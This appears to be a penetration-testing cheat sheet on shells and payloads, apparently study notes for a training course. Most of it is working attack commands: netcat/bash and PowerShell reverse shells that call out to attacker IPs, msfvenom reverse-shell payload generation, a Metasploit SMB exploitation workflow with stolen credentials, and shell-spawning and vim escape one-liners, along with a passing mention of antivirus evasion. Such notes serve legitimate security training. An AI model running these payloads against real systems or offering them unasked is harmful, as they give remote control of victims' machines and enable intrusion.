Shells & Payloads: Payloads Overview

Payloads Overview

Types of Payloads

  • Staged Payloads

    • Sends initial stage first, then downloads main payload

    • Better for environments with sufficient memory

    • Example naming: windows/meterpreter/reverse_tcp

  • Stageless Payloads

    • Entire payload sent at once

    • Ideal for low-bandwidth environments

    • Example naming: windows/meterpreter_reverse_tcp

Essential Payload Commands

Netcat/Bash Reverse Shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

PowerShell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"

MSFvenom Payload Generation

  • List Available Payloads

    msfvenom -l payloads
  • Linux Payload Creation

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
  • Windows Payload Creation

    msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Windows System Infiltration

Fingerprinting Windows Hosts

  • TTL Check via Ping

    ping <target_ip>    # Look for TTL=128 or 32
  • Nmap OS Detection

    sudo nmap -v -O <target_ip>
    sudo nmap -v -A <target_ip>    # Aggressive scan

Key Windows Ports

  • 139, 445: NetBIOS/SMB

  • 135: MSRPC

  • 443: HTTPS

Common Windows Payloads

  1. DLLs: For privilege escalation and UAC bypass

  2. Batch Files (.bat): Automation scripts

  3. VBScript (.vbs): Client-side automation

  4. MSI Files: Installation packages

  5. PowerShell Scripts: System automation and exploitation

Metasploit Attack Workflow

# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit

Linux System Infiltration

Pre-Exploitation Checklist

Interactive Shell Spawning Methods

  • Python TTY Shell

    python -c 'import pty; pty.spawn("/bin/sh")'
  • Basic Shell Spawning

    /bin/sh -i
    perl -e 'exec "/bin/sh";'
    ruby -e 'exec "/bin/sh";'
    lua -e 'os.execute("/bin/sh")'
    awk 'BEGIN {system("/bin/sh")}'
  • VIM Shell Escape

    vim -c ':!/bin/sh'
    # Or in VIM:
    :set shell=/bin/sh
    :shell

Permission Checks

# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l

Best Practices

Pre-Exploitation

  • Always perform thorough reconnaissance

  • Document all findings and attempted exploits

  • Verify target scope and permissions

Post-Exploitation

  • Maintain access securely

  • Document all changes made to the system

  • Clean up after testing is complete

Security Considerations

  • Use staged payloads for better reliability

  • Consider antivirus evasion techniques

  • Always use secure channels for communication